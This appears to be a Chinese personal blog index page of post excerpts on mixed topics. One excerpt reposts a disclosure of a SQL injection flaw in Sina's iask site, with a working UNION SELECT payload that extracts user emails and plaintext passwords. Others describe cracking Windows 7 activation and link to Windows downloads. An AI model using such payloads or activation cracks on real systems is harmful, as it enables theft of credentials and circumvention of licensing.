永远的wing

Sina这个公司，再出了这么大的泄密事件后还用明文存密码。另外，大家可以关注这个ip 114.255.171.227 它记录了包括访问铁道部网站12306的所有途径用户的信息，包括IP地址，发送的请求，包含的cookie等等，而且，每个人都可以直接访问下载。据说铁道订票网站也是以明文传递密码的。你觉得他们是无知和无意的吗？

这是转载的 “2012年新浪微博用户密码泄露漏洞”http://www.youxia.org/2012/01/2012-SINA-weibo-user-password-lose.html

相关厂商：www.sina.com
作者：http://weibo.com/evilniang
发现时间：2012-1-1
漏洞类型：sql注射
危害等级：高
漏洞状态：已修复

首先申明：该漏洞发现后本人已联系新浪官方修复漏洞，目前漏洞以修补。文章内容公布，仅供参考学习。

新浪网iask存在sql注射漏洞，利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。

漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9

漏洞利用方式:

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11–

这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。
(全文 …)

经常听到有人题2012的问题，到底只是传说还是有科学上的依据？转载一个视频，里面有2012可能的极端空间天气事件的说明。

2009年11月，美国灾难电影《2012》在全球同步上映，影片中地球遭遇浩劫时的恐怖景象让互联网上流传了数年的2012玛雅预言再次升温。这个预言的大意是，在玛雅遗址一块残缺的石碑上用古老的玛雅象形文字写着第13个世纪将在2012年12月21日结束，某件事情将会发生，但究竟会发生什么由于碑文残缺而无法知道。 (全文 …)

比尔盖茨大二时的数学作业,发表于SCI期刊《Discrete Mathematics》1979年27卷。

标题: BOUNDS FOR SORTING BY PREFIX REVERSAL
作者: GATES WH; PAPADIMITRIOU CH
来源出版物: DISCRETE MATHEMATICS 卷: 27 期: 1 页: 47-57 DOI: 10.1016/0012-365X(79)90068-2 出版年: 1979
被引频次: 82 (来自 Web of Science)

出题目的是Christos Papadimitriou（后面简称帕帕），帕帕是一位希腊裔的美国人，是一位著名的数学家，目前也是美国工程院院士。当时他还在哈佛大学任教（青椒），由于教的数学课没什么人感兴趣，他也就随便应付一下（我自己想的，呵呵），多数时间搞自己喜欢的研究。课程结束后，他布置了一道非常难的题目。他很“满意”，绝大多数学生都交了白卷，唯独一份一卷子让他眼前一亮——没错就是比尔盖茨的答卷。后来，他找到盖茨，劝说他毕业之后跟自己做研究生。盖茨问他什么样的研究是比较Top的领域，他说你做的答卷就算是。
(全文 …)

最近到五台山，看到一页有关佛教的宣传品，上面就一篇文章–“常怀感激”，不知道原作者是谁。我拿来看了一下，虽然文中有些地方有很深的佛教影子，好像有点儿“鸵鸟心态”的感觉，不过整体上还是很不错的。也许我的理解有误或是境界不够，那种在高修为的佛法大师眼里的“苦行僧”似的逆来顺受的心态，我不能认同。生物的进化需要正常的竞争，而矛盾是无处不在的，无“争”的世界只能存在于想象当中，为了受苦而受无谓的苦是没有意义的。但是，正常的“争”也可以是一把双刃剑，而过度扭曲的“争”则是毒药，从古到今，毁在这上面的人太多了，正所谓物极必反，能拿捏得当的人还是太少。当然，价值取向是多元化的，比如越王勾践，卧薪尝胆，立志复国，又如陈汤的“明犯强汉者，虽远必诛”，这样的争斗佛家是反对的，但主流社会还是认同并且推崇他们的作为。人们都希望人生中有闪耀的时刻，起伏的人生是精彩的，无论站在峰上还是谷底，我们最需要的是平和的心，这篇佛教文章的一些地方还是对我们有很大的启发，来看看这篇关于“感激”的文章。

(全文 …)

　　文/陈漠

　　最爱“快进”，狂点“刷新”。评论，要抢“沙发”。寄信，最好是特快专递。拍照，最好是立等可取。坐车，最好是高速公路、高速铁路、磁悬浮。坐飞机，最好是直航。做事，最好是名利双收。创业，最好是一夜暴富。结婚，最好有现房现车。排队，最好能插队。若不能，就会琢磨：为什么别人排的队总比我的快呢？

　　没有时间感的中国人变成了最着急最不耐烦的地球人，“一万年太久，只争朝夕”。

　　中国人为什么丧失了慢的能力？资源紧缺引发争夺，分配不平衡带来倾轧，速度带来烦躁，便利加重烦躁，时代的心态就是再也不愿意等。

　　可以快，就决不能慢。有了比较，加上重复、单调、复杂、呆板、逼仄、拖延、消耗、超出理解范围、失控和不公平等经常性的情境，中国人急不可耐，又因欲求未满而耐心等待，焦躁不安又心安理得。

　　急的心态带来了什么？欲速则不达。“大多数人在追求快乐时急得上气不接下气，以至于和快乐擦肩而过。”(克尔凯郭尔语)我们迎来了更多的灾难和意外，更低的效率和更坏的结果。

　　就这样，在“急之国”，我们快速地消耗着自己。等我们真正明白快慢、张弛、紧疏、得失、成败、忙闲的人生之道时，可能一切都晚了。

　　 (全文 …)

    今天看到有联想win7旗舰版证书和oemkey,只要你的主板刷了联想的SLIC2.1,就可以顺利激活.这回是真的完美激活了,不是以前的文件替换法.上图

完美的OEM激活

(全文 …)

http://bbs.wuyou.com/viewthread.php?tid=145090&extra=page%3D1

2009-07-23：重要脚本修正，解决源DVD无法进行imagex /mountrw和wimutil /RW的问题，ImDisk.exe升级至v1.1.4.23；请解压下面文件(Win7peBuilder_ServicePatch0723.rar)替换并覆盖WinBuilder里面的脚本即可。此ServicePatch也可在无忧FTP下载。
Win7peBuilder_ServicePatch0723.part01.rar (390.62 KB)
Win7peBuilder_ServicePatch0723.part02.rar (390.62 KB)
Win7peBuilder_ServicePatch0723.part03.rar (390.62 KB)
Win7peBuilder_ServicePatch0723.part04.rar (390.62 KB)
Win7peBuilder_ServicePatch0723.part05.rar (390.62 KB)
Win7peBuilder_ServicePatch0723.part06.rar (390.62 KB)
Win7peBuilder_ServicePatch0723.part07.rar (8.67 KB)
2009-07-20：今天Win7peBuilder已经进入完成阶段，从此我就真正可以撒手不管了。新发表的Win7peBuilder.2009.07.20支持使用Win7_RTM，Vista/2008_SP1和SP2作源DVD操作，自动辨别操作系统，智能生成中英文PECMD.INI和WINPESHL.INI，可用WAIK（需要预装）的PEIMG添加驱动，WIN7启动的背景颜色预置为浅蓝，图形介面的GRUB4DOS启动菜单，两分钟内完成启动和网络初始化，WIN7的BOOT.WIM体积减少至164MB，VISTA/2008的减少至152MB水平。新版Win7peBuilder.2009.07.20.rar已经完成上传到无忧的zhaohj和zhxy9804的FTP，在 /khauyeung/Win7peBuilder/ 下面。现可下载！同时间发放的还有用Win7peBuilder.2009.07.20制成的 (全文 …)

Windows 7 RTM 倒计时：破解激活Windows 7方式、方法研究兼论微软对于“破解”的态度

     目前，微软最忙活的是两件事：一是抓紧进行Windows 7 RTM的编译终审，力求7月13日顺利推出；二是大张旗鼓地进行售前预定，以期10月22日全球首发一炮走红。我想，大家也在关心关注两件事：其一，期盼“RTM版”早日泄漏提供下载；其二，期盼“RTM版”早日成功破解激活。 �
 �
    就Windows 7正版激活方式而言，“零售版”的激活流程是：首先，输入“安装密钥”；然后，连接到“微软激活服务器”，对于输入密钥进行验证(在数据库中已经储存了“已售”和“待售”光盘的全部密钥)；最后，根据“输入密钥”正确与否，决定是否予以“激活”。“OEM版”采用的是“SLP 2.X 验证技术”，电脑开机后：1。如果检测到有效产品密钥，验证过程启动；2。如果检测到有效OEM证书，验证过程继续；3。如果产品密钥、OEM证书和BIOS中的ACPI_SLIC完全匹配，则结束验证自行激活。

    截至目前已经出现的Windows 7 7264破解激活方法，不管采用什么方式，实际都是用“RC版”的两个激活文件“替换”其对应文件，用“RC版”公测密钥连接“微软激活服务器”从而实现激活(这从使用最后到期时间仍是“2010年6月2日”可以得以证明)。鉴于Windows 7 7264已经脱离“RC”而无限接近“RTM ”，因此，可以激活Windows 7 7264的“手动”或“工具”破解激活方法，估计极有可能破解激活Windows 7 RTM。在此多说一句：不要期盼也不要相信“网上密钥”会直接激活Windows 7 RTM，因为Windows 7 RTM不可能有VOL(大客户)。
(全文 …)

Windows 1.x系列：

http://www.qiannao.com/space/show/ishagua/上传分享/US__win1.01.rar/.page

http://www.qiannao.com/space/show/ishagua/上传分享/US__win1.02.rar/.page

http://www.qiannao.com/space/show/ishagua/上传分享/US__win1.03.rar/.page

http://www.qiannao.com/space/show/ishagua/上传分享/US__win1.04.rar/.page

Windows 2.x系列：
(全文 …)

    摘自<中国青年报>

    首先，特别感谢中国乃至世界各大物理系杰出的光棍们，没有他们的迫切需要，就没有这篇文章的面世。 其次，鸣谢以下单位和个人的鼎力支持与无私赞助：北京大学物理系 清华大学数理基础科学班 南京大学物理系 中国科技大学物理系 Department of Physics,Stanford University Department of Physics, University of Washington Prof. Stephen Shenker ,Stanford University Prof. Phil Bucksbaum, Stanford University Prof. Warren Buck, University of Washington
　　
　　我们与上帝对弈，尝试解答宇宙的奥秘；我们深入细小的空间，研究上帝留下的最细微的线索和音符；然后我们用埋在每个原子中的神秘力量阐述世界和星空，实现一个又一个浪漫的梦想。正因为我们的力量，人类借来了太阳的火焰和光；正因为我们的力量，人类得以像飞鸟一样展翅翱翔；正因为我们的力量，人类可以与马儿赛跑；正因为我们的力量，不再需要鸿雁，相爱的心就可以在电话里拥抱；正因为我们的力量，由曾经遥不可及的漫天星斗构成的神奇画卷缓缓在人类面前展开。
　　
　　和一个真正优秀的物理学家在一起的时光决不会像女孩们想象的无趣和无聊。恰恰相反，他会带领你走上一段曼妙的旅程。充满活力、创造力和热情的物理学家不会放弃任何一个给你浪漫惊喜的机会，因为物理学家的头脑比任何职场精英、工程师或者其他科学家都更接近艺术，却比艺术家冷静、理智和严密的多。他们能给你依靠的肩膀，却同样可以给你绝不平淡的生活。 一个神奇的现象目前，在中国女生眼中，“物理学家”或者“物理系学生”是很渗人的。具体体现在，如果某个物理系男生对某个女生说明他是学物理的，几乎立刻会获得“粪便效应”。具体表现为，该女生会对该男生立刻敬而远之。中国女孩们似乎认为，

(全文 …)